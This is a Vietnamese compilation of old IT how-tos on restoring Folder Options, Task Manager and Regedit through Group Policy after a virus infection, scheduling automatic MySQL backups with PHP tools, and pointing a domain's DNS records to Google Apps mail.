Bạn bấm Start > Run, gõ gpedit.msc rồi bấm Enter. Ở cửa sổ Group Policy hiện ra, trong khung bên trái, lần lượt bấm dấu cộng (+) trước các hàng chữ: User Configuration; Administrative Templates; Windows Components; bấm chuột lên hàng chữ Windows Explorer; bấm đúp chuột lên hàng chữ Remove the Folder Options menu item from the Tools menu, bấm chọn Disable ở cửa sổ hiện ra và bấm OK.

Nếu vẫn chưa thấy Folder Options xuất hiện trong menu Tools, bạn thực hiện lại 2 lần thao tác trên: Chọn Enable ở lần thứ nhất và Disable ở lần thứ hai.

Khôi phục Task Manager

Trong khung bên trái của cửa sổ Group Policy nói trên, bạn cũng lần lượt bấm dấu cộng (+) trước các hàng chữ: User Configuration, Administrative Templates, System, Ctrl+Alt+Del Options. Bấm đúp chuột lên hàng chữ Remove Task Manager trong khung bên trái, bấm chọn Disable ở cửa sổ hiện ra, bấm OK.

Nếu Task Manager vẫn bị mờ hoặc thấy cửa sổ Windows Task Manager chỉ chớp lên khi bấm tổ hợp 3 phím Ctrl + Alt + Del, bạn thực hiện lại thao tác trên với lựa chọn Enable và Disable như ở phần Folder Options.

Khôi phục lệnh Regedit

Trong cửa sổ Group Policy, bạn lần lượt bấm dấu cộng (+) trước các hàng chữ: User Configuration, Administrative Templates, System. Bấm đúp chuột lên hàng chữ Prevent access to registry editing tools trong khung bên trái, bấm chọn Disable ở cửa sổ hiện ra, bấm OK. Có thể bạn cũng sẽ phải thực hiện lại như khi khôi phục Folder Options, Task Manager để chạy được lệnh này.

Sau khi khôi phục 3 thành phần trên, bạn khởi động lại máy tính. Nếu chúng tiếp tục bị mất là máy tính của bạn vẫn còn bị nhiễm virus. Do vậy, bạn tiếp tục cập nhật chương trình diệt virus đang dùng hoặc cài chương trình diệt virus khác để quét toàn bộ đĩa cứng và đĩa flash USB.

Tự động back-up CSDL MySQL

Việc backup CSDL đã trở thành vấn đề sống còn cho các webmaster ngăn chặn những thiệt hại đáng tiếc xảy ra khi website bị lỗi, nhưng việc liên tục vào để backup đúng là một cực hình và cũng rất mất thời gian.
Đối với những hosting có hỗ trợ chế độ tự động chạy backup thì quá tốt, nhưng với những hosting ko hỗ trợ thì sao, cái này cần phải xem xét kĩ đó vì ngày nào cũng vào thì mệt mà việc backup đặt file chưa chắc đã được chính xác.
Trong bài viết này tôi sẽ hướng dẫn các bạn backup tự động trên các hosting không hỗ trợ việc này, và file sau khi backup sẽ được lưu trữ : trên 1 hòm thư đối với CSDL dạng nhỏ và trên host với CSDL khá lớn.
Đầu tiên các bạn cần 2 tools nhỏ là PhpJobScheduler và
PhpMySQLAutoBackup
Bạn hãy tải 2 files trên, giải nén và sửa đổi một chút trước khi up lên host.

Đối với PhpJobScheduler :

Không phải sửa gì

=))

Đối với PhpMySQLAutoBackup

Mở file run.php và sửa các thông tin cho đúng với host của bạn
$db : tên của CSDL
$mysql_username : username
$mysql_password : password
$emailaddress : điạ chỉ mail mà bạn muốn gửi file backup về
$save_backup_zip_file_to_server : set là 1 nếu bạn muốn nhớ file đó trên server

Sau khi upload lên server rồi, bạn hoàn toàn có thể chạy thử chế độ backup thủ công như sau : gõ vào trình duyệt :

http://sitecuaban/phpMySQLAutoBackup/run.php

Và đợi một chút, nếu có thư gửi đến hoặc file được save lại thì việc cần làm với phpMySQLAutoBackup kết thúc

Tiếp theo là PhpJobScheduler, sau khi upload xong bạn CHÚ Ý làm như sau

Đặt mật khẩu cho thư mục pjsfiles, cái này là tối quan trọng vì pjsfiles là nơi để bạn thêm những việc chạy tự động.
Mở đường dẫn sau : http://sitecuaban/PhpJobScheduler/pjsfiles/index.php và cấu hình CSDL, tên đăng nhập và pass của CSDL, việc này chỉ cần làm 1 lần duy nhất

Tiếp theo là edit một số thứ trong trang web của bạn
Thêm đoạn mã sau vào ĐẦU trang index của bạn (index.php hoặc bất cứ trang nào liên quan đến nó)



Hoặc thêm đoạn mã sau vào CUỐI trang index, bạn phải đảm bảo cho đoạn mã này xuất hiện khi trang web được mở ra.



Cách thứ 2 có vẻ đơn giản hơn nhưng người dùng có thể thấy link đến nơi backup của bạn, tuy nhiên biết link cũng chả làm được gì vì mình có pass rùi mà ^^

Cuối cùng là vào http://sitecuaban/PhpJobScheduler/pjsfiles/index.php để bắt đầu thiết đặt những file làm tự động, trong đó bạn hãy thêm vào link sau http://sitecuaban/phpMySQLAutoBackup/run.php và thiết đặt thời gian là 1 giờ, 1 ngày hay 1 tuần, chỉ cần trong khoảng 30 phút chênh lệch trước giờ bạn đặt thì data sẽ tự động được backup.

Vậy nếu site của bạn không có đông người truy cập lắm thì sao nhỉ, vấn đề này giải quyết rất đơn giản thôi, bạn hãy mở file config.inc.php trong thư mục pjsfiles ra, chỉnh TIME_WINDOW từ 1800 thành thời gian bạn muốn (tính bằng giây), mặc định 1800 tức là 30 phút.
Vậy là cơ bản đã xong, việc tui nói đến CSDL nhỏ lớn lúc đầu của tutorial này thực ra vô cùng đơn giản, bạn chỉ cần chú ý một chút, khi sửa file run.php, nếu là CSDL nhỏ bạn hãy đặt mail, còn nếu CSDL quá lớn, hãy đặt chế độ save trên server, khi này bạn sẽ phải CMOD file backup lên 777 đó.
Enjoy với một CSDL được backup liên tục nhé :D

Làm Mail Server với Google App

Mình mới config xong mail server bằng việc sử dụng dịch vụ google app của google.com . Sau đây mình xin chia xẻ một số kinh nghiệm cũng như cách cấu hình sử dụng dịch vụ này . Để sử dụng được dịch vụ google apps bạn phải vào đây đăng ký một tài khoản ứng với account domain của mình :

Link :
http://www.google.com/a/cpanel/domain/new

cách đăng ký chắc là mình không phải hướng dẫn chứ nhỉ . hì hì

Sau khi đăng ký xong thì đây là những bước cấu hình cơ bản trên domain cho phép bạn có thể sử dụng được mail server của google :

Bước 1 : Thực thi quyền sở hữu domain ( Verify domain ownership )
ở đây tôi chọn phương thức change CNAME nên làm như sau :
Vào config DNS của domain add thêm một bản ghi CNAME với nội dụng như sau :

Host : googled546979372f873d5.youdomain.com
Type : CNAME
Value : google.com

chú ý : googled546979372f873d5 --> đây là dẫy số của mình còn các bạn thì phải copy trong phần Verify domain ownership của chính domain của bạn được google khởi tạo .


Sau khi xong nhấp tiếp vào phần Verify đê thực thi.

Bước 2: tạo một bản ghi host A trỏ về địa chỉ về ghs.google.com or ip: 72.14.207.121

Host : mail.yourdomain.com
Type: A
Value: 72.14.207.121

Bước 3: chuyển các bản ghi MX về server của google:

MX Server address Priority
ASPMX.L.GOOGLE.COM. 1
ALT1.ASPMX.L.GOOGLE.COM. 5
ALT2.ASPMX.L.GOOGLE.COM. 5
ASPMX2.GOOGLEMAIL.COM. 10
ASPMX3.GOOGLEMAIL.COM. 10
ASPMX4.GOOGLEMAIL.COM. 10
ASPMX5.GOOGLEMAIL.COM. 10

Cũng làm như bước trên các bạn add thêm 7 bản ghi MX tương ứng với list trên của google :

Host : yourdomain.com
Type : MX
Value: ALT1.ASPMX.L.GOOGLE.COM
MX : 1


Các bạn làm tương tự với các bản ghi MX còn lại nhé . Sau khi làm xong các bạn tìm đến biểu tượng email . Nhấp vào dòng chữ nhỏ ở phía dưới Active email. Google sẽ cập nhật bản ghi MX của bạn trong vòng 48H.

Những bước cơ bản để sử dụng được google apps rồi để login vào mail của bạn thì vào link : http://mail.google.com/a/yourdomain.com . Còn các tính năng còn lại các bạn tự khám phá nhé . Chúc vui .

Tất cả những ví dụ trên mình làm trên hệ thống quản lý DNS của Everydns . Còn lại tùy thuộc vào phần quản lý DNS của các bạn .